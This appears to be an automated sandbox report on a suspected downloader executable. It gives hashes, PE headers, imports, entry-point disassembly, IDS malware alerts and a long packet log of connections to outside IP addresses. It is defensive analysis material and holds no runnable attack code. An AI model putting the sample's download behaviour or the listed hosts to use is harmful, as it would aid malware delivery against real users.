                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:rFa24c148.exe
                                                                                            File size:1'005'202 bytes
                                                                                            MD5:7644ebbf786053ffaf95dbe86b7de5d4
                                                                                            SHA1:5d563fb10f6d71049ae5f69fb6ccb9f2217ddf32
                                                                                            SHA256:0b7ba80811d300aefe42de77b7b8fb2d5b6f9a8d4f2cf3d1213b6fead5efb59b
                                                                                            SHA512:d2da4f4ce1d26aca8e497e0d889d34ce9a4ec06b50245eb29a1feb7c7c20fce281e0dbefa37d234230163ebeaa602f1a49edee312024628387d2759896434a3c
                                                                                            SSDEEP:24576:ynE9Wlvj9UENDYuRe5In2hINGct2YBD9w254CQ+K1Q:yEiJUTOn2hINGctTDOBC7
                                                                                            TLSH:FA25234B7BDCE017C1868E362A67C639D975AC182929874B3B31BF2F6A343D56D18384
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L.....oS.................^...*.......1.......p....@
                                                                                            Icon Hash:b8333351accc5531
                                                                                            Entrypoint:0x4031ff
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x536FD795 [Sun May 11 20:03:33 2014 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:7ed0d71376e55d58ab36dc7d3ffda898
                                                                                            Instruction
                                                                                            sub esp, 000002D4h
                                                                                            push ebx
                                                                                            push ebp
                                                                                            push esi
                                                                                            push edi
                                                                                            push 00000020h
                                                                                            xor ebp, ebp
                                                                                            pop esi
                                                                                            mov dword ptr [esp+14h], ebp
                                                                                            mov dword ptr [esp+10h], 004092D8h
                                                                                            mov dword ptr [esp+1Ch], ebp
                                                                                            call dword ptr [00407034h]
                                                                                            push 00008001h
                                                                                            call dword ptr [00407134h]
                                                                                            push ebp
                                                                                            call dword ptr [004072ACh]
                                                                                            push 00000008h
                                                                                            mov dword ptr [00429258h], eax
                                                                                            call 00007F80C50E4974h
                                                                                            mov dword ptr [004291A4h], eax
                                                                                            push ebp
                                                                                            lea eax, dword ptr [esp+34h]
                                                                                            push 000002B4h
                                                                                            push eax
                                                                                            push ebp
                                                                                            push 00420658h
                                                                                            call dword ptr [0040717Ch]
                                                                                            push 004092C0h
                                                                                            push 004281A0h
                                                                                            call 00007F80C50E45DFh
                                                                                            call dword ptr [00407138h]
                                                                                            mov ebx, 00434000h
                                                                                            push eax
                                                                                            push ebx
                                                                                            call 00007F80C50E45CDh
                                                                                            push ebp
                                                                                            call dword ptr [0040710Ch]
                                                                                            cmp word ptr [00434000h], 0022h
                                                                                            mov dword ptr [004291A0h], eax
                                                                                            mov eax, ebx
                                                                                            jne 00007F80C50E1ADAh
                                                                                            push 00000022h
                                                                                            mov eax, 00434002h
                                                                                            pop esi
                                                                                            push esi
                                                                                            push eax
                                                                                            call 00007F80C50E401Eh
                                                                                            push eax
                                                                                            call dword ptr [00407240h]
                                                                                            mov dword ptr [esp+18h], eax
                                                                                            jmp 00007F80C50E1B9Eh
                                                                                            push 00000020h
                                                                                            pop edx
                                                                                            cmp cx, dx
                                                                                            jne 00007F80C50E1AD9h
                                                                                            inc eax
                                                                                            inc eax
                                                                                            cmp word ptr [eax], dx
                                                                                            je 00007F80C50E1ACBh
                                                                                            add word ptr [eax], 0000h
                                                                                            Programming Language:
                                                                                            • [EXP] VC++ 6.0 SP5 build 8804
                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x620000x3a210.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x5cf60x5e00eee41166f9daa8eae9e9b5d18d2d3c6eFalse0.6619431515957447data6.441066052438077IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x70000x13540x14002f90a087fd075d2b61c65e6db9ea1417False0.4314453125data5.037502749366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0x90000x202980x600eaa9954d4bef1481fc1bddefea6bf878False0.4609375data3.6563423252168445IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .ndata0x2a0000x380000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0x620000x3a2100x3a400f91af9b4d232be8e11695918d7fec713False0.43928547478540775data4.7460567769423365IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_ICON0x623b80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.26944575890216493
                                                                                            RT_ICON0x72be00xb6acPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.988794799418356
                                                                                            RT_ICON0x7e2900x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.3126708009249527
                                                                                            RT_ICON0x877380x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560EnglishUnited States0.32300751879699247
                                                                                            RT_ICON0x8df200x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.3179297597042514
                                                                                            RT_ICON0x933a80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.32646433632498817
                                                                                            RT_ICON0x975d00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.36317427385892115
                                                                                            RT_ICON0x99b780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.40150093808630394
                                                                                            RT_ICON0x9ac200x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.44426229508196724
                                                                                            RT_ICON0x9b5a80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.48936170212765956
                                                                                            RT_DIALOG0x9ba100x100dataEnglishUnited States0.5234375
                                                                                            RT_DIALOG0x9bb100x11cdataEnglishUnited States0.6056338028169014
                                                                                            RT_DIALOG0x9bc300xc4dataEnglishUnited States0.5918367346938775
                                                                                            RT_DIALOG0x9bcf80x60dataEnglishUnited States0.7291666666666666
                                                                                            RT_GROUP_ICON0x9bd580x92dataEnglishUnited States0.7191780821917808
                                                                                            RT_VERSION0x9bdf00x114dataEnglishUnited States0.6086956521739131
                                                                                            RT_MANIFEST0x9bf080x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984
                                                                                            DLLImport
                                                                                            KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, SetFileAttributesW, ExpandEnvironmentStringsW, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, SetErrorMode, GetCommandLineW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                                                                                            USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                                                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                            SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                            ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                            COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                            ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                                            VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States
                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2024-10-28T02:02:41.620398+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449736172.217.18.110443TCP
                                                                                            2024-10-28T02:02:48.017603+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449738193.122.6.16880TCP
                                                                                            2024-10-28T02:02:49.517616+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449738193.122.6.16880TCP
                                                                                            2024-10-28T02:02:50.234028+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449740188.114.96.3443TCP
                                                                                            2024-10-28T02:02:51.174212+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449741193.122.6.16880TCP
                                                                                            2024-10-28T02:02:52.814456+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449743193.122.6.16880TCP
                                                                                            2024-10-28T02:02:53.524437+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449744188.114.96.3443TCP
                                                                                            2024-10-28T02:02:55.203844+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449746188.114.96.3443TCP
                                                                                            2024-10-28T02:03:00.071669+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449769188.114.96.3443TCP
                                                                                            2024-10-28T02:03:01.696824+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449781188.114.96.3443TCP
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Oct 28, 2024 02:02:40.314754009 CET49736443192.168.2.4172.217.18.110
                                                                                            Oct 28, 2024 02:02:40.314814091 CET44349736172.217.18.110192.168.2.4
                                                                                            Oct 28, 2024 02:02:40.314897060 CET49736443192.168.2.4172.217.18.110
                                                                                            Oct 28, 2024 02:02:40.324665070 CET49736443192.168.2.4172.217.18.110
                                                                                            Oct 28, 2024 02:02:40.324686050 CET44349736172.217.18.110192.168.2.4
                                                                                            Oct 28, 2024 02:02:41.203975916 CET44349736172.217.18.110192.168.2.4
                                                                                            Oct 28, 2024 02:02:41.204046965 CET49736443192.168.2.4172.217.18.110
                                                                                            Oct 28, 2024 02:02:41.205064058 CET44349736172.217.18.110192.168.2.4
                                                                                            Oct 28, 2024 02:02:41.205126047 CET49736443192.168.2.4172.217.18.110
                                                                                            Oct 28, 2024 02:02:41.257138014 CET49736443192.168.2.4172.217.18.110
                                                                                            Oct 28, 2024 02:02:41.257184029 CET44349736172.217.18.110192.168.2.4
                                                                                            Oct 28, 2024 02:02:41.257791996 CET44349736172.217.18.110192.168.2.4
                                                                                            Oct 28, 2024 02:02:41.257869959 CET49736443192.168.2.4172.217.18.110
                                                                                            Oct 28, 2024 02:02:41.261569023 CET49736443192.168.2.4172.217.18.110
                                                                                            Oct 28, 2024 02:02:41.303347111 CET44349736172.217.18.110192.168.2.4
                                                                                            Oct 28, 2024 02:02:41.620398045 CET44349736172.217.18.110192.168.2.4
                                                                                            Oct 28, 2024 02:02:41.620634079 CET49736443192.168.2.4172.217.18.110
                                                                                            Oct 28, 2024 02:02:41.620672941 CET44349736172.217.18.110192.168.2.4
                                                                                            Oct 28, 2024 02:02:41.620735884 CET49736443192.168.2.4172.217.18.110
                                                                                            Oct 28, 2024 02:02:41.620824099 CET49736443192.168.2.4172.217.18.110
                                                                                            Oct 28, 2024 02:02:41.620938063 CET44349736172.217.18.110192.168.2.4
                                                                                            Oct 28, 2024 02:02:41.621292114 CET44349736172.217.18.110192.168.2.4
                                                                                            Oct 28, 2024 02:02:41.621366978 CET49736443192.168.2.4172.217.18.110
                                                                                            Oct 28, 2024 02:02:41.621396065 CET49736443192.168.2.4172.217.18.110
                                                                                            Oct 28, 2024 02:02:41.670907974 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:41.670957088 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:41.671081066 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:41.671304941 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:41.671324015 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:42.559190035 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:42.559277058 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:42.566833019 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:42.566859007 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:42.567384005 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:42.567451000 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:42.567899942 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:42.611346006 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.278151989 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.278434038 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.287025928 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.287144899 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.397032976 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.397187948 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.397233009 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.397281885 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.397289038 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.397339106 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.397344112 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.397387981 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.408406973 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.408649921 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.408674955 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.408838034 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.413129091 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.413224936 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.413240910 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.413305044 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.422746897 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.422866106 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.422914982 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.423046112 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.432197094 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.432318926 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.432338953 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.432405949 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.441586018 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.441765070 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.441793919 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.441883087 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.451229095 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.451356888 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.451383114 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.451466084 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.460850000 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.460978031 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.461003065 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.461117029 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.470069885 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.470174074 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.470186949 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.470258951 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.519743919 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.519884109 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.519932985 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.520030022 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.520036936 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.520082951 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.520093918 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.520140886 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.520169973 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.520222902 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.520299911 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.520351887 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.520401001 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.520454884 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.520515919 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.520566940 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.526966095 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.527081013 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.527089119 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.527142048 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.539005041 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.539129972 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.539135933 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.539182901 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.541888952 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.541954041 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.541959047 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.542198896 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.549169064 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.549257040 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.549263954 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.549308062 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.554939032 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.555020094 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.555032015 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.555039883 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.555123091 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.561100960 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.561233997 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.561239004 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.561306953 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.567291975 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.567419052 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.567431927 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.567502022 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.573267937 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.573420048 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.573447943 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.573513031 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.579463959 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.579565048 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.579580069 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.579648018 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.585633993 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.585766077 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.585791111 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.585916042 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.591994047 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.592094898 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.592104912 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.592175007 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.598591089 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.598726988 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.598735094 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.598802090 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.604387999 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.604496956 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.604681015 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.604759932 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.610352993 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.610490084 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.610501051 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.610603094 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.616494894 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.616604090 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.616616011 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.616681099 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.622708082 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.622776985 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.622806072 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.622869968 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.633294106 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.633481026 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.633510113 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.633584976 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.634747982 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.634814978 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.634833097 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.634879112 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.641398907 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.641484022 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.641496897 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.641546965 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.654714108 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.654863119 CET49737443192.168.2.4142.250.185.225
                                                                                            Oct 28, 2024 02:02:45.654877901 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.654936075 CET44349737142.250.185.225192.168.2.4
                                                                                            Oct 28, 2024 02:02:45.655045033 CET49737443192.168.2.4142.250.185.225
